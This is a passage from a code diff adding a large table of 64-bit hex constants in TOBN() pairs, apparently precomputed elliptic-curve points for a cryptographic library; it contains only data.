+     TOBN(0x5a5c31e1, 0x1e4a45a1), TOBN(0x1e5d55fe, 0x9cb0db2f),
+     TOBN(0x74661b06, 0x8ff5cc29), TOBN(0x026b389f, 0x0eb8a4f4),
+     TOBN(0x536b21a4, 0x58848c24), TOBN(0x2e5bf8ec, 0x81dc72b0),
+     TOBN(0x03c187d0, 0xad886aac), TOBN(0x5c16878a, 0xb771b645),
+     TOBN(0xb07dfc6f, 0xc74045ab), TOBN(0x2c6360bf, 0x7800caed),
+     TOBN(0x24295bb5, 0xb9c972a3), TOBN(0xc9e6f88e, 0x7c9a6dba),
+     TOBN(0x90ffbf24, 0x92a79aa6), TOBN(0xde29d50a, 0x41c26ac2),
+     TOBN(0x9f0af483, 0xd309cbe6), TOBN(0x5b020d8a, 0xe0bced4f),
+     TOBN(0x606e986d, 0xb38023e3), TOBN(0xad8f2c9d, 0x1abc6933),
+     TOBN(0x19292e1d, 0xe7400e93), TOBN(0xfe3e18a9, 0x52be5e4d),
+     TOBN(0xe8e9771d, 0x2e0680bf), TOBN(0x8c5bec98, 0xc54db063),
+     TOBN(0x2af9662a, 0x74a55d1f), TOBN(0xe3fbf28f, 0x046f66d8),
+     TOBN(0xa3a72ab4, 0xd4dc4794), TOBN(0x09779f45, 0x5c7c2dd8),
+     TOBN(0xd893bdaf, 0xc3d19d8d), TOBN(0xd5a75094, 0x57d6a6df),
+     TOBN(0x8cf8fef9, 0x952e6255), TOBN(0x3da67cfb, 0xda9a8aff),
+     TOBN(0x4c23f62a, 0x2c160dcd), TOBN(0x34e6c5e3, 0x8f90eaef),
+     TOBN(0x35865519, 0xa9a65d5a), TOBN(0x07c48aae, 0x8fd38a3d),
+     TOBN(0xb7e7aeda, 0x50068527), TOBN(0x2c09ef23, 0x1c90936a),
+     TOBN(0x31ecfeb6, 0xe879324c), TOBN(0xa0871f6b, 0xfb0ec938),
+     TOBN(0xb1f0fb68, 0xd84d835d), TOBN(0xc90caf39, 0x861dc1e6),
+     TOBN(0x12e5b046, 0x7594f8d7), TOBN(0x26897ae2, 0x65012b92),
+     TOBN(0xbcf68a08, 0xa4d6755d), TOBN(0x403ee41c, 0x0991fbda),
+     TOBN(0x733e343e, 0x3bbf17e8), TOBN(0xd2c7980d, 0x679b3d65),
+     TOBN(0x33056232, 0xd2e11305), TOBN(0x966be492, 0xf3c07a6f),
+     TOBN(0x6a8878ff, 0xbb15509d), TOBN(0xff221101, 0x0a9b59a4),
+     TOBN(0x6c9f564a, 0xabe30129), TOBN(0xc6f2c940, 0x336e64cf),
+     TOBN(0x0fe75262, 0x8b0c8022), TOBN(0xbe0267e9, 0x6ae8db87),
+     TOBN(0x22e192f1, 0x93bc042b), TOBN(0xf085b534, 0xb237c458),
+     TOBN(0xa0d192bd, 0x832c4168), TOBN(0x7a76e9e3, 0xbdf6271d),
+     TOBN(0x52a882fa, 0xb88911b5), TOBN(0xc85345e4, 0xb4db0eb5),
+     TOBN(0xa3be02a6, 0x81a7c3ff), TOBN(0x51889c8c, 0xf0ec0469),
+     TOBN(0x9d031369, 0xa5e829e5), TOBN(0xcbb4c6fc, 0x1607aa41),
+     TOBN(0x75ac59a6, 0x241d84c1), TOBN(0xc043f2bf, 0x8829e0ee),
+     TOBN(0x82a38f75, 0x8ea5e185), TOBN(0x8bda40b9, 0xd87cbd9f),
+     TOBN(0x9e65e75e, 0x2d8fc601), TOBN(0x3d515f74, 0xa35690b3),
+     TOBN(0x534acf4f, 0xda79e5ac), TOBN(0x68b83b3a, 0x8630215f),
+     TOBN(0x5c748b2e, 0xd085756e), TOBN(0xb0317258, 0xe5d37cb2),
+     TOBN(0x6735841a, 0xc5ccc2c4), TOBN(0x7d7dc96b, 0x3d9d5069),
+     TOBN(0xa147e410, 0xfd1754bd), TOBN(0x65296e94, 0xd399ddd5),
+     TOBN(0xf6b5b2d0, 0xbc8fa5bc), TOBN(0x8a5ead67, 0x500c277b),
+     TOBN(0x214625e6, 0xdfa08a5d), TOBN(0x51fdfedc, 0x959cf047),
+     TOBN(0x6bc9430b, 0x289fca32), TOBN(0xe36ff0cf, 0x9d9bdc3f),
+     TOBN(0x2fe187cb, 0x58ea0ede), TOBN(0xed66af20, 0x5a900b3f),
+     TOBN(0x00e0968b, 0x5fa9f4d6), TOBN(0x2d4066ce, 0x37a362e7),
+     TOBN(0xa99a9748, 0xbd07e772), TOBN(0x710989c0, 0x06a4f1d0),
+     TOBN(0xd5dedf35, 0xce40cbd8), TOBN(0xab55c5f0, 0x1743293d),
+     TOBN(0x766f1144, 0x8aa24e2c), TOBN(0x94d874f8, 0x605fbcb4),
+     TOBN(0xa365f0e8, 0xa518001b), TOBN(0xee605eb6, 0x9d04ef0f),
+     TOBN(0x5a3915cd, 0xba8d4d25), TOBN(0x44c0e1b8, 0xb5113472),
+     TOBN(0xcbb024e8, 0x8b6740dc), TOBN(0x89087a53, 0xee1d4f0c),
+     TOBN(0xa88fa05c, 0x1fc4e372), TOBN(0x8bf395cb, 0xaf8b3af2),
+     TOBN(0x1e71c9a1, 0xdeb8568b), TOBN(0xa35daea0, 0x80fb3d32),
+     TOBN(0xe8b6f266, 0x2cf8fb81), TOBN(0x6d51afe8, 0x9490696a),
+     TOBN(0x81beac6e, 0x51803a19), TOBN(0xe3d24b7f, 0x86219080),
+     TOBN(0x727cfd9d, 0xdf6f463c), TOBN(0x8c6865ca, 0x72284ee8),
+     TOBN(0x32c88b7d, 0xb743f4ef), TOBN(0x3793909b, 0xe7d11dce),
+     TOBN(0xd398f922, 0x2ff2ebe8), TOBN(0x2c70ca44, 0xe5e49796),
+     TOBN(0xdf4d9929, 0xcb1131b1), TOBN(0x7826f298, 0x25888e79),
+     TOBN(0x4d3a112c, 0xf1d8740a), TOBN(0x00384cb6, 0x270afa8b),
+     TOBN(0xcb64125b, 0x3ab48095), TOBN(0x3451c256, 0x62d05106),
+     TOBN(0xd73d577d, 0xa4955845), TOBN(0x39570c16, 0xbf9f4433),
+     TOBN(0xd7dfaad3, 0xadecf263), TOBN(0xf1c3d8d1, 0xdc76e102),
+     TOBN(0x5e774a58, 0x54c6a836), TOBN(0xdad4b672, 0x3e92d47b),
+     TOBN(0xbe7e990f, 0xf0d796a0), TOBN(0x5fc62478, 0xdf0e8b02),
+     TOBN(0x8aae8bf4, 0x030c00ad), TOBN(0x3d2db93b, 0x9004ba0f),
+     TOBN(0xe48c8a79, 0xd85d5ddc), TOBN(0xe907caa7, 0x6bb07f34),
+     TOBN(0x58db343a, 0xa39eaed5), TOBN(0x0ea6e007, 0xadaf5724),
+     TOBN(0xe00df169, 0xd23233f3), TOBN(0x3e322796, 0x77cb637f),
+     TOBN(0x1f897c0e, 0x1da0cf6c), TOBN(0xa651f5d8, 0x31d6bbdd),
+     TOBN(0xdd61af19, 0x1a230c76), TOBN(0xbd527272, 0xcdaa5e4a),
+     TOBN(0xca753636, 0xd0abcd7e), TOBN(0x78bdd37c, 0x370bd8dc),
+     TOBN(0xc23916c2, 0x17cd93fe), TOBN(0x65b97a4d, 0xdadce6e2),
+     TOBN(0xe04ed4eb, 0x174e42f8), TOBN(0x1491ccaa, 0xbb21480a),
+     TOBN(0x145a8280, 0x23196332), TOBN(0x3c3862d7, 0x587b479a),
+     TOBN(0x9f4a88a3, 0x01dcd0ed), TOBN(0x4da2b7ef, 0x3ea12f1f),
+     TOBN(0xf8e7ae33, 0xb126e48e), TOBN(0x404a0b32, 0xf494e237),
+     TOBN(0x9beac474, 0xc55acadb), TOBN(0x4ee5cf3b, 0xcbec9fd9),
+     TOBN(0x336b33b9, 0x7df3c8c3), TOBN(0xbd905fe3, 0xb76808fd),
+     TOBN(0x8f436981, 0xaa45c16a), TOBN(0x255c5bfa, 0x3dd27b62),
+     TOBN(0x71965cbf, 0xc3dd9b4d), TOBN(0xce23edbf, 0xfc068a87),
+     TOBN(0xb78d4725, 0x745b029b), TOBN(0x74610713, 0xcefdd9bd),
+     TOBN(0x7116f75f, 0x1266bf52), TOBN(0x02046722, 0x18e49bb6),
+     TOBN(0xdf43df9f, 0x3d6f19e3), TOBN(0xef1bc7d0, 0xe685cb2f),
+     TOBN(0xcddb27c1, 0x7078c432), TOBN(0xe1961b9c, 0xb77fedb7),
+     TOBN(0x1edc2f5c, 0xc2290570), TOBN(0x2c3fefca, 0x19cbd886),
+     TOBN(0xcf880a36, 0xc2af389a), TOBN(0x96c610fd, 0xbda71cea),
+     TOBN(0xf03977a9, 0x32aa8463), TOBN(0x8eb7763f, 0x8586d90a),
+     TOBN(0x3f342454, 0x2a296e77), TOBN(0xc8718683, 0x42837a35),
+     TOBN(0x7dc71090, 0x6a09c731), TOBN(0x54778ffb, 0x51b816db),
+     TOBN(0x6b33bfec, 0xaf06defd), TOBN(0xfe3c105f, 0x8592b70b),
+     TOBN(0xf937fda4, 0x61da6114), TOBN(0x3c13e651, 0x4c266ad7),
+     TOBN(0xe363a829, 0x855938e8), TOBN(0x2eeb5d9e, 0x9de54b72),
+     TOBN(0xbeb93b0e, 0x20ccfab9), TOBN(0x3dffbb5f, 0x25e61a25),
+     TOBN(0x7f655e43, 0x1acc093d), TOBN(0x0cb6cc3d, 0x3964ce61),
+     TOBN(0x6ab283a1, 0xe5e9b460), TOBN(0x55d787c5, 0xa1c7e72d),
+     TOBN(0x4d2efd47, 0xdeadbf02), TOBN(0x11e80219, 0xac459068),
+     TOBN(0x810c7626, 0x71f311f0), TOBN(0xfa17ef8d, 0x4ab6ef53),
+     TOBN(0xaf47fd25, 0x93e43bff), TOBN(0x5cb5ff3f, 0x0be40632),
+     TOBN(0x54687106, 0x8ee61da3), TOBN(0x7764196e, 0xb08afd0f),
+     TOBN(0x831ab3ed, 0xf0290a8f), TOBN(0xcae81966, 0xcb47c387),
+     TOBN(0xaad7dece, 0x184efb4f), TOBN(0xdcfc53b3, 0x4749110e),
+     TOBN(0x6698f23c, 0x4cb632f9), TOBN(0xc42a1ad6, 0xb91f8067),
+     TOBN(0xb116a81d, 0x6284180a), TOBN(0xebedf5f8, 0xe901326f),
+     TOBN(0xf2274c9f, 0x97e3e044), TOBN(0x42018520, 0x11d09fc9),
+     TOBN(0x56a65f17, 0xd18e6e23), TOBN(0x2ea61e2a, 0x352b683c),
+     TOBN(0x27d291bc, 0x575eaa94), TOBN(0x9e7bc721, 0xb8ff522d),
+     TOBN(0x5f7268bf, 0xa7f04d6f), TOBN(0x5868c73f, 0xaba41748),
+     TOBN(0x9f85c2db, 0x7be0eead), TOBN(0x511e7842, 0xff719135),
+     TOBN(0x5a06b1e9, 0xc5ea90d7), TOBN(0x0c19e283, 0x26fab631),
+     TOBN(0x8af8f0cf, 0xe9206c55), TOBN(0x89389cb4, 0x3553c06a),
+     TOBN(0x39dbed97, 0xf65f8004), TOBN(0x0621b037, 0xc508991d),
+     TOBN(0x1c52e635, 0x96e78cc4), TOBN(0x5385c8b2, 0x0c06b4a8),
+     TOBN(0xd84ddfdb, 0xb0e87d03), TOBN(0xc49dfb66, 0x934bafad),
+     TOBN(0x7071e170, 0x59f70772), TOBN(0x3a073a84, 0x3a1db56b),
+     TOBN(0x03494903, 0x3b8af190), TOBN(0x7d882de3, 0xd32920f0),
+     TOBN(0x91633f0a, 0xb2cf8940), TOBN(0x72b0b178, 0x6f948f51),
+     TOBN(0x2d28dc30, 0x782653c8), TOBN(0x88829849, 0xdb903a05),
+     TOBN(0xb8095d0c, 0x6a19d2bb), TOBN(0x4b9e7f0c, 0x86f782cb),
+     TOBN(0x7af73988, 0x2d907064), TOBN(0xd12be0fe, 0x8b32643c),
+     TOBN(0x358ed23d, 0x0e165dc3), TOBN(0x3d47ce62, 0x4e2378ce),
+     TOBN(0x7e2bb0b9, 0xfeb8a087), TOBN(0x3246e8ae, 0xe29e10b9),
+     TOBN(0x459f4ec7, 0x03ce2b4d), TOBN(0xe9b4ca1b, 0xbbc077cf),
+     TOBN(0x2613b4f2, 0x0e9940c1), TOBN(0xfc598bb9, 0x047d1eb1),
+     TOBN(0x9744c62b, 0x45036099), TOBN(0xa9dee742, 0x167c65d8),
+     TOBN(0x0c511525, 0xdabe1943), TOBN(0xda110554, 0x93c6c624),
+     TOBN(0xae00a52c, 0x651a3be2), TOBN(0xcda5111d, 0x884449a6),
+     TOBN(0x063c06f4, 0xff33bed1), TOBN(0x73baaf9a, 0x0d3d76b4),
+     TOBN(0x52fb0c9d, 0x7fc63668), TOBN(0x6886c9dd, 0x0c039cde),
+     TOBN(0x602bd599, 0x55b22351), TOBN(0xb00cab02, 0x360c7c13),
+     TOBN(0x8cb616bc, 0x81b69442), TOBN(0x41486700, 0xb55c3cee),
+     TOBN(0x71093281, 0xf49ba278), TOBN(0xad956d9c, 0x64a50710),
+     TOBN(0x9561f28b, 0x638a7e81), TOBN(0x54155cdf, 0x5980ddc3),
+     TOBN(0xb2db4a96, 0xd26f247a), TOBN(0x9d774e4e, 0x4787d100),
+     TOBN(0x1a9e6e2e, 0x078637d2), TOBN(0x1c363e2d, 0x5e0ae06a),
+     TOBN(0x7493483e, 0xe9cfa354), TOBN(0x76843cb3, 0x7f74b98d),
+     TOBN(0xbaca6591, 0xd4b66947), TOBN(0xb452ce98, 0x04460a8c),
+     TOBN(0x6830d246, 0x43768f55), TOBN(0xf4197ed8, 0x7dff12df),
+     TOBN(0x6521b472, 0x400dd0f7), TOBN(0x59f5ca8f, 0x4b1e7093),
+     TOBN(0x6feff11b, 0x080338ae), TOBN(0x0ada31f6, 0xa29ca3c6),
+     TOBN(0x24794eb6, 0x94a2c215), TOBN(0xd83a43ab, 0x05a57ab4),
+     TOBN(0x264a543a, 0x2a6f89fe), TOBN(0x2c2a3868, 0xdd5ec7c2),
+     TOBN(0xd3373940, 0x8439d9b2), TOBN(0x715ea672, 0x0acd1f11),
+     TOBN(0x42c1d235, 0xe7e6cc19), TOBN(0x81ce6e96, 0xb990585c),
+     TOBN(0x04e5dfe0, 0xd809c7bd), TOBN(0xd7b2580c, 0x8f1050ab),
+     TOBN(0x6d91ad78, 0xd8a4176f), TOBN(0x0af556ee, 0x4e2e897c),
+     TOBN(0x162a8b73, 0x921de0ac), TOBN(0x52ac9c22, 0x7ea78400),
+     TOBN(0xee2a4eea, 0xefce2174), TOBN(0xbe61844e, 0x6d637f79),
+     TOBN(0x0491f1bc, 0x789a283b), TOBN(0x72d3ac3d, 0x880836f4),
+     TOBN(0xaa1c5ea3, 0x88e5402d), TOBN(0x1b192421, 0xd5cc473d),
+     TOBN(0x5c0b9998, 0x9dc84cac), TOBN(0xb0a8482d, 0x9c6e75b8),
+     TOBN(0x639961d0, 0x3a191ce2), TOBN(0xda3bc865, 0x6d837930),
+     TOBN(0xca990653, 0x056e6f8f), TOBN(0x84861c41, 0x64d133a7),
+     TOBN(0x8b403276, 0x746abe40), TOBN(0xb7b4d51a, 0xebf8e303),
+     TOBN(0x05b43211, 0x220a255d), TOBN(0xc997152c, 0x02419e6e),
+     TOBN(0x76ff47b6, 0x630c2fea), TOBN(0x50518677, 0x281fdade),
+     TOBN(0x3283b8ba, 0xcf902b0b), TOBN(0x8d4b4eb5, 0x37db303b),
+     TOBN(0xcc89f42d, 0x755011bc), TOBN(0xb43d74bb, 0xdd09d19b),
+     TOBN(0x65746bc9, 0x8adba350), TOBN(0x364eaf8c, 0xb51c1927),
+     TOBN(0x13c76596, 0x10ad72ec), TOBN(0x30045121, 0xf8d40c20),
+     TOBN(0x6d2d99b7, 0xea7b979b), TOBN(0xcd78cd74, 0xe6fb3bcd),
+     TOBN(0x11e45a9e, 0x86cffbfe), TOBN(0x78a61cf4, 0x637024f6),
+     TOBN(0xd06bc872, 0x3d502295), TOBN(0xf1376854, 0x458cb288),
+     TOBN(0xb9db26a1, 0x342f8586), TOBN(0xf33effcf, 0x4beee09e),
+     TOBN(0xd7e0c4cd, 0xb30cfb3a), TOBN(0x6d09b8c1, 0x6c9db4c8),
+     TOBN(0x40ba1a42, 0x07c8d9df), TOBN(0x6fd495f7, 0x1c52c66d),
+     TOBN(0xfb0e169f, 0x275264da), TOBN(0x80c2b746, 0xe57d8362),
+     TOBN(0xedd987f7, 0x49ad7222), TOBN(0xfdc229af, 0x4398ec7b),}
+    ,
+    {TOBN(0xb0d1ed84, 0x52666a58), TOBN(0x4bcb6e00, 0xe6a9c3c2),
+     TOBN(0x3c57411c, 0x26906408), TOBN(0xcfc20755, 0x13556400),
+     TOBN(0xa08b1c50, 0x5294dba3), TOBN(0xa30ba286, 0x8b7dd31e),
+     TOBN(0xd70ba90e, 0x991eca74), TOBN(0x094e142c, 0xe762c2b9),
+     TOBN(0xb81d783e, 0x979f3925), TOBN(0x1efd130a, 0xaf4c89a7),
+     TOBN(0x525c2144, 0xfd1bf7fa), TOBN(0x4b296904, 0x1b265a9e),
+     TOBN(0xed8e9634, 0xb9db65b6), TOBN(0x35c82e32, 0x03599d8a),
+     TOBN(0xdaa7a54f, 0x403563f3), TOBN(0x9df088ad, 0x022c38ab),
+     TOBN(0xe5cfb066, 0xbb3fd30a), TOBN(0x429169da, 0xeff0354e),
+     TOBN(0x809cf852, 0x3524e36c), TOBN(0x136f4fb3, 0x0155be1d),
+     TOBN(0x4826af01, 0x1fbba712), TOBN(0x6ef0f0b4, 0x506ba1a1),
+     TOBN(0xd9928b31, 0x77aea73e), TOBN(0xe2bf6af2, 0x5eaa244e),
+     TOBN(0x8d084f12, 0x4237b64b), TOBN(0x688ebe99, 0xe3ecfd07),
+     TOBN(0x57b8a70c, 0xf6845dd8), TOBN(0x808fc59c, 0x5da4a325),
+     TOBN(0xa9032b2b, 0xa3585862), TOBN(0xb66825d5, 0xedf29386),
+     TOBN(0xb5a5a8db, 0x431ec29b), TOBN(0xbb143a98, 0x3a1e8dc8),
+     TOBN(0x35ee94ce, 0x12ae381b), TOBN(0x3a7f176c, 0x86ccda90),
+     TOBN(0xc63a657e, 0x4606eaca), TOBN(0x9ae5a380, 0x43cd04df),
+     TOBN(0x9bec8d15, 0xed251b46), TOBN(0x1f5d6d30, 0xcaca5e64),
+     TOBN(0x347b3b35, 0x9ff20f07), TOBN(0x4d65f034, 0xf7e4b286),
+     TOBN(0x9e93ba24, 0xf111661e), TOBN(0xedced484, 0xb105eb04),
+     TOBN(0x96dc9ba1, 0xf424b578), TOBN(0xbf8f66b7, 0xe83e9069),
+     TOBN(0x872d4df4, 0xd7ed8216), TOBN(0xbf07f377, 0x8e2cbecf),
+     TOBN(0x4281d899, 0x98e73754), TOBN(0xfec85fbb, 0x8aab8708),
+     TOBN(0x9a3c0dee, 0xa5ba5b0b), TOBN(0xe6a116ce, 0x42d05299),
+     TOBN(0xae9775fe, 0xe9b02d42), TOBN(0x72b05200, 0xa1545cb6),
+     TOBN(0xbc506f7d, 0x31a3b4ea), TOBN(0xe5893078, 0x8bbd9b32),
+     TOBN(0xc8bc5f37, 0xe4b12a97), TOBN(0x6b000c06, 0x4a73b671),
+     TOBN(0x13b5bf22, 0x765fa7d0), TOBN(0x59805bf0, 0x1d6a5370),
+     TOBN(0x67a5e29d, 0x4280db98), TOBN(0x4f53916f, 0x776b1ce3),
+     TOBN(0x714ff61f, 0x33ddf626), TOBN(0x4206238e, 0xa085d103),
+     TOBN(0x1c50d4b7, 0xe5809ee3), TOBN(0x999f450d, 0x85f8eb1d),
+     TOBN(0x658a6051, 0xe4c79e9b), TOBN(0x1394cb73, 0xc66a9fea),
+     TOBN(0x27f31ed5, 0xc6be7b23), TOBN(0xf4c88f36, 0x5aa6f8fe),
+     TOBN(0x0fb0721f, 0x4aaa499e), TOBN(0x68b3a7d5, 0xe3fb2a6b),
+     TOBN(0xa788097d, 0x3a92851d), TOBN(0x060e7f8a, 0xe96f4913),
+     TOBN(0x82eebe73, 0x1a3a93bc), TOBN(0x42bbf465, 0xa21adc1a),
+     TOBN(0xc10b6fa4, 0xef030efd), TOBN(0x247aa4c7, 0x87b097bb),
+     TOBN(0x8b8dc632, 0xf60c77da), TOBN(0x6ffbc26a, 0xc223523e),
+     TOBN(0xa4f6ff11, 0x344579cf), TOBN(0x5825653c, 0x980250f6),
+     TOBN(0xb2dd097e, 0xbc1aa2b9), TOBN(0x07889393, 0x37a0333a),
+     TOBN(0x1cf55e71, 0x37a0db38), TOBN(0x2648487f, 0x792c1613),
+     TOBN(0xdad01336, 0x3fcef261), TOBN(0x6239c81d, 0x0eabf129),
+     TOBN(0x8ee761de, 0x9d276be2), TOBN(0x406a7a34, 0x1eda6ad3),
+     TOBN(0x4bf367ba, 0x4a493b31), TOBN(0x54f20a52, 0x9bf7f026),
+     TOBN(0xb696e062, 0x9795914b), TOBN(0xcddab96d, 0x8bf236ac),
+     TOBN(0x4ff2c70a, 0xed25ea13), TOBN(0xfa1d09eb, 0x81cbbbe7),
+     TOBN(0x88fc8c87, 0x468544c5), TOBN(0x847a670d, 0x696b3317),
+     TOBN(0xf133421e, 0x64bcb626), TOBN(0xaea638c8, 0x26dee0b5),
+     TOBN(0xd6e7680b, 0xb310346c), TOBN(0xe06f4097, 0xd5d4ced3),
+     TOBN(0x09961452, 0x7512a30b), TOBN(0xf3d867fd, 0xe589a59a),
+     TOBN(0x2e73254f, 0x52d0c180), TOBN(0x9063d8a3, 0x333c74ac),
+     TOBN(0xeda6c595, 0xd314e7bc), TOBN(0x2ee7464b, 0x467899ed),
+     TOBN(0x1cef423c, 0x0a1ed5d3), TOBN(0x217e76ea, 0x69cc7613),
+     TOBN(0x27ccce1f, 0xe7cda917), TOBN(0x12d8016b, 0x8a893f16),
+     TOBN(0xbcd6de84, 0x9fc74f6b), TOBN(0xfa5817e2, 0xf3144e61),
+     TOBN(0x1f354164, 0x0821ee4c), TOBN(0x1583eab4, 0x0bc61992),
+     TOBN(0x7490caf6, 0x1d72879f), TOBN(0x998ad9f3, 0xf76ae7b2),
+     TOBN(0x1e181950, 0xa41157f7), TOBN(0xa9d7e1e6, 0xe8da3a7e),
+     TOBN(0x963784eb, 0x8426b95f), TOBN(0x0ee4ed6e, 0x542e2a10),
+     TOBN(0xb79d4cc5, 0xac751e7b), TOBN(0x93f96472, 0xfd4211bd),
+     TOBN(0x8c72d3d2, 0xc8de4fc6), TOBN(0x7b69cbf5, 0xdf44f064),
+     TOBN(0x3da90ca2, 0xf4bf94e1), TOBN(0x1a5325f8, 0xf12894e2),
+     TOBN(0x0a437f6c, 0x7917d60b), TOBN(0x9be70486, 0x96c9cb5d),
+     TOBN(0xb4d880bf, 0xe1dc5c05), TOBN(0xd738adda, 0xeebeeb57),
+     TOBN(0x6f0119d3, 0xdf0fe6a3), TOBN(0x5c686e55, 0x66eaaf5a),
+     TOBN(0x9cb10b50, 0xdfd0b7ec), TOBN(0xbdd0264b, 0x6a497c21),
+     TOBN(0xfc093514, 0x8c546c96), TOBN(0x58a947fa, 0x79dbf42a),
+     TOBN(0xc0b48d4e, 0x49ccd6d7), TOBN(0xff8fb02c, 0x88bd5580),
+     TOBN(0xc75235e9, 0x07d473b2), TOBN(0x4fab1ac5, 0xa2188af3),
+     TOBN(0x030fa3bc, 0x97576ec0), TOBN(0xe8c946e8, 0x0b7e7d2f),
+     TOBN(0x40a5c9cc, 0x70305600), TOBN(0x6d8260a9, 0xc8b013b4),
+     TOBN(0x0368304f, 0x70bba85c), TOBN(0xad090da1, 0xa4a0d311),
+     TOBN(0x7170e870, 0x2415eec1), TOBN(0xbfba35fe, 0x8461ea47),
+     TOBN(0x6279019a, 0xc1e91938), TOBN(0xa47638f3, 0x1afc415f),
+     TOBN(0x36c65cbb, 0xbcba0e0f), TOBN(0x02160efb, 0x034e2c48),
+     TOBN(0xe6c51073, 0x615cd9e4), TOBN(0x498ec047, 0xf1243c06),
+     TOBN(0x3e5a8809, 0xb17b3d8c), TOBN(0x5cd99e61, 0x0cc565f1),
+     TOBN(0x81e312df, 0x7851dafe), TOBN(0xf156f5ba, 0xa79061e2),
+     TOBN(0x80d62b71, 0x880c590e), TOBN(0xbec9746f, 0x0a39faa1),
+     TOBN(0x1d98a9c1, 0xc8ed1f7a), TOBN(0x09e43bb5, 0xa81d5ff2),
+     TOBN(0xd5f00f68, 0x0da0794a), TOBN(0x412050d9, 0x661aa836),
+     TOBN(0xa89f7c4e, 0x90747e40), TOBN(0x6dc05ebb, 0xb62a3686),
+     TOBN(0xdf4de847, 0x308e3353), TOBN(0x53868fbb, 0x9fb53bb9),
+     TOBN(0x2b09d2c3, 0xcfdcf7dd), TOBN(0x41a9fce3, 0x723fcab4),
+     TOBN(0x73d905f7, 0x07f57ca3), TOBN(0x080f9fb1, 0xac8e1555),
+     TOBN(0x7c088e84, 0x9ba7a531), TOBN(0x07d35586, 0xed9a147f),
+     TOBN(0x602846ab, 0xaf48c336), TOBN(0x7320fd32, 0x0ccf0e79),
+     TOBN(0xaa780798, 0xb18bd1ff), TOBN(0x52c2e300, 0xafdd2905),
+     TOBN(0xf27ea3d6, 0x434267cd), TOBN(0x8b96d16d, 0x15605b5f),
+     TOBN(0x7bb31049, 0x4b45706b), TOBN(0xe7f58b8e, 0x743d25f8),
+     TOBN(0xe9b5e45b, 0x87f30076), TOBN(0xd19448d6, 0x5d053d5a),
+     TOBN(0x1ecc8cb9, 0xd3210a04), TOBN(0x6bc7d463, 0xdafb5269),
+     TOBN(0x3e59b10a, 0x67c3489f), TOBN(0x1769788c, 0x65641e1b),
+     TOBN(0x8a53b82d, 0xbd6cb838), TOBN(0x7066d6e6, 0x236d5f22),
+     TOBN(0x03aa1c61, 0x6908536e), TOBN(0xc971da0d, 0x66ae9809),
+     TOBN(0x01b3a86b, 0xc49a2fac), TOBN(0x3b8420c0, 0x3092e77a),
+     TOBN(0x02057300, 0x7d6fb556), TOBN(0x6941b2a1, 0xbff40a87),
+     TOBN(0x140b6308, 0x0658ff2a), TOBN(0x87804363, 0x3424ab36),
+     TOBN(0x0253bd51, 0x5751e299), TOBN(0xc75bcd76, 0x449c3e3a),
+     TOBN(0x92eb4090, 0x7f8f875d), TOBN(0x9c9d754e, 0x56c26bbf),
+     TOBN(0x158cea61, 0x8110bbe7), TOBN(0x62a6b802, 0x745f91ea),
+     TOBN(0xa79c41aa, 0xc6e7394b), TOBN(0x445b6a83, 0xad57ef10),
+     TOBN(0x0c5277eb, 0x6ea6f40c), TOBN(0x319fe96b, 0x88633365),
+     TOBN(0x0b0fc61f, 0x385f63cb), TOBN(0x41250c84, 0x22bdd127),
+     TOBN(0x67d153f1, 0x09e942c2), TOBN(0x60920d08, 0xc021ad5d),
+     TOBN(0x229f5746, 0x724d81a5), TOBN(0xb7ffb892, 0x5bba3299),
+     TOBN(0x518c51a1, 0xde413032), TOBN(0x2a9bfe77, 0x3c2fd94c),
+     TOBN(0xcbcde239, 0x3191f4fd), TOBN(0x43093e16, 0xd3d6ada1),
+     TOBN(0x184579f3, 0x58769606), TOBN(0x2c94a8b3, 0xd236625c),
+     TOBN(0x6922b9c0, 0x5c437d8e), TOBN(0x3d4ae423, 0xd8d9f3c8),
+     TOBN(0xf72c31c1, 0x2e7090a2), TOBN(0x4ac3f5f3, 0xd76a55bd),
+     TOBN(0x342508fc, 0x6b6af991), TOBN(0x0d527100, 0x1b5cebbd),
+     TOBN(0xb84740d0, 0xdd440dd7), TOBN(0x748ef841, 0x780162fd),
+     TOBN(0xa8dbfe0e, 0xdfc6fafb), TOBN(0xeadfdf05, 0xf7300f27),
+     TOBN(0x7d06555f, 0xfeba4ec9), TOBN(0x12c56f83, 0x9e25fa97),
+     TOBN(0x77f84203, 0xd39b8c34), TOBN(0xed8b1be6, 0x3125eddb),
+     TOBN(0x5bbf2441, 0xf6e39dc5), TOBN(0xb00f6ee6, 0x6a5d678a),
+     TOBN(0xba456ecf, 0x57d0ea99), TOBN(0xdcae0f58, 0x17e06c43),
+     TOBN(0x01643de4, 0x0f5b4baa), TOBN(0x2c324341, 0xd161b9be),
+     TOBN(0x80177f55, 0xe126d468), TOBN(0xed325f1f, 0x76748e09),
+     TOBN(0x6116004a, 0xcfa9bdc2), TOBN(0x2d8607e6, 0x3a9fb468),
+     TOBN(0x0e573e27, 0x6009d660), TOBN(0x3a525d2e, 0x8d10c5a1),
+     TOBN(0xd26cb45c, 0x3b9009a0), TOBN(0xb6b0cdc0, 0xde9d7448),
+     TOBN(0x949c9976, 0xe1337c26), TOBN(0x6faadebd, 0xd73d68e5),
+     TOBN(0x9e158614, 0xf1b768d9), TOBN(0x22dfa557, 0x9cc4f069),
+     TOBN(0xccd6da17, 0xbe93c6d6), TOBN(0x24866c61, 0xa504f5b9),
+     TOBN(0x2121353c, 0x8d694da1), TOBN(0x1c6ca580, 0x0140b8c6),
+     TOBN(0xc245ad8c, 0xe964021e), TOBN(0xb83bffba, 0x032b82b3),
+     TOBN(0xfaa220c6, 0x47ef9898), TOBN(0x7e8d3ac6, 0x982c948a),
+     TOBN(0x1faa2091, 0xbc2d124a), TOBN(0xbd54c3dd, 0x05b15ff4),
+     TOBN(0x386bf3ab, 0xc87c6fb7), TOBN(0xfb2b0563, 0xfdeb6f66),
+     TOBN(0x4e77c557, 0x5b45afb4), TOBN(0xe9ded649, 0xefb8912d),
+     TOBN(0x7ec9bbf5, 0x42f6e557), TOBN(0x2570dfff, 0x62671f00),
+     TOBN(0x2b3bfb78, 0x88e084bd), TOBN(0xa024b238, 0xf37fe5b4),
+     TOBN(0x44e7dc04, 0x95649aee), TOBN(0x498ca255, 0x5e7ec1d8),
+     TOBN(0x3bc766ea, 0xaaa07e86), TOBN(0x0db6facb, 0xf3608586),
+     TOBN(0xbadd2549, 0xbdc259c8), TOBN(0x95af3c6e, 0x041c649f),
+     TOBN(0xb36a928c, 0x02e30afb), TOBN(0x9b5356ad, 0x008a88b8),
